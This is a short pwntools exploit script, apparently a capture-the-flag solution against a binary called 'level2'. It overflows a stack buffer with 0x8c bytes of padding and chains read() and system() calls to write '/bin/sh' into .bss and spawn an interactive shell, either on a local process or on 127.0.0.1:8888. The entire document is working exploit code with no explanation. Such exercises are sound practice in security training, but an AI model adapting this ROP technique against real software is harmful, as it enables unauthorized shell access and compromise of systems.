1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
|
from pwn import *
flag = True if flag: elf = ELF('./level2') p = process(elf.path) else: host = '127.0.0.1' port = 8888 p = remote(host, port) bss = elf.bss() + 0x08 pop3ret = 0x08048519 system = elf.plt['system'] read = elf.plt['read'] read_args = p32(0) + p32(bss) + p32(20) payload = 'A' * 0x8c + p32(read) + p32(pop3ret) + read_args + p32(system) + p32(0xdeadbeef) + p32(bss) p.recvline() p.sendline(payload) p.sendline("/bin/sh\x00") p.interactive()
|